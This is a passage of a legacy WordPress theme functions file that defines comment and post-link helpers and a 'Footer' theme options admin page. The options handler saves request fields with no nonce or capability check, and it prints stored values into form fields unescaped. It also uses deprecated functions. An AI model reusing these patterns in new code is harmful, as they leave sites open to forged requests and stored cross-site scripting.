    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
		'get_comment_link'    =>   htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ,
		'get_comment_date'    =>   sprintf(__('%1$s at %2$s', THEME_NS), get_comment_date(),  get_comment_time()),
		'edit_comment_link'   =>   art_get_edit_comment_link(),
		'comment_text'        =>   art_get_comment_text(),
		'comment_reply_link'  =>   art_get_comment_reply_link($args, $depth)))); ?>      
     </div>
<?php
}

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy-comments.php';  
    endif;  
    return $file;  
} 

if ( function_exists('add_theme_support') ) {
	add_theme_support('post-thumbnails');
  add_theme_support('nav-menus');
  add_theme_support('automatic-feed-links');
}

if (function_exists('register_nav_menus')) {
    register_nav_menus(
		array(
			'primary-menu'   =>   __( 'Primary Menu', THEME_NS),
			'secondary-menu' =>   __( 'Secondary Menu', THEME_NS)
		)
	);
}
 

function art_add_admin() {
	global $options;
  if ( $_GET['page'] == basename(__FILE__) ) {
    if ('save' == $_REQUEST['action'] ) {
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            art_update_option( $value['id'], $_REQUEST[ $value['id'] ] );
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              art_update_option($up_opt, $_REQUEST[$up_opt] );
            }
          }
      }
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            if( isset( $_REQUEST[ $value['id'] ] ) ) { art_update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); }
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              if( isset( $_REQUEST[ $up_opt ] ) ) { art_update_option( $up_opt, $_REQUEST[ $up_opt ]  ); } else { delete_option( $up_opt ); }
            }
          }
      }
      header("Location: themes.php?page=functions.php&saved=true");
      die;
    } 
  }
  add_theme_page("Footer", "Footer", 'edit_themes', basename(__FILE__), 'art_admin');
}
add_action('admin_menu', 'art_add_admin');

     
	
function art_update_option($key, $value){
	update_option($key, (get_magic_quotes_gpc()) ? stripslashes($value) : $value);
}


function art_admin() {
    global $options;
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><strong>'.art_option('theme.name') . ' settings saved.</strong></p></div>';
?>
<div class="wrap">
	<h2>Footer</h2>

	<form method="post">

		<table class="optiontable" style="width:100%;">

<?php foreach ($options as $value) {
   
    switch ( $value['type'] ) {
        case 'text':
        option_wrapper_header($value);
        ?>
                <input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_settings( $value['id'] ) != "") { echo get_settings( $value['id'] ); } else { echo $value['std']; } ?>" />
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'select':
        option_wrapper_header($value);
        ?>
                <select style="width:70%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
                    <?php foreach ($value['options'] as $option) { ?>
                    <option<?php if ( get_settings( $value['id'] ) == $option) { echo ' selected="selected"'; } elseif ($option == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $option; ?></option>
                    <?php } ?>
                </select>
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'textarea':
        $ta_options = $value['options'];
        option_wrapper_header($value);
        ?>
                <textarea name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" style="width:100%;height:100px;"><?php
                if( get_settings($value['id']) !== false) {
                        echo stripslashes(get_settings($value['id']));
                    }else{
                        echo $value['std'];
                }?></textarea>
        <?php
        option_wrapper_footer($value);
        break;

        case "radio":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                $radio_setting = get_settings($value['id']);
                if($radio_setting != ''){
                    if ($key == get_settings($value['id']) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="radio" name="<?php echo $value['id']; ?>" value="<?php echo $key; ?>" <?php echo $checked; ?> /><?php echo $option; ?><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "checkbox":
        option_wrapper_header($value);
                        if(get_settings($value['id'])){
                            $checked = "checked=\"checked\"";
                        }else{
                            $checked = "";
                        }
                    ?>
                    <input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />
        <?php
        option_wrapper_footer($value);
        break;

        case "multicheck":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                 $pn_key = $value['id'] . '_' . $key;
                $checkbox_setting = get_settings($pn_key);
                if($checkbox_setting != ''){
                    if (get_settings($pn_key) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="checkbox" name="<?php echo $pn_key; ?>" id="<?php echo $pn_key; ?>" value="true" <?php echo $checked; ?> /><label for="<?php echo $pn_key; ?>"><?php echo $option; ?></label><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "heading":
        ?>
        <tr valign="top">
            <td colspan="2" style="text-align: center;"><h3><?php echo $value['name']; ?></h3></td>
        </tr>
        <?php
        break;
       
        default:

        break;
    }
}
?>

		</table>

		<p class="submit">
			<input name="save" type="submit" value="Save changes" />
			<input type="hidden" name="action" value="save" />
		</p>
	</form>
</div>
<?php
}

function option_wrapper_header($values){
    ?>
    <tr valign="top">
        <th scope="row" style="width:1%;white-space: nowrap;"><?php echo $values['name']; ?>:</th>
        <td>
    <?php
}

function option_wrapper_footer($values){
    ?>
        </td>
    </tr>
    <tr valign="top">
        <td>&nbsp;</td><td><small><?php echo $values['desc']; ?></small></td>
    </tr>
    <?php
}
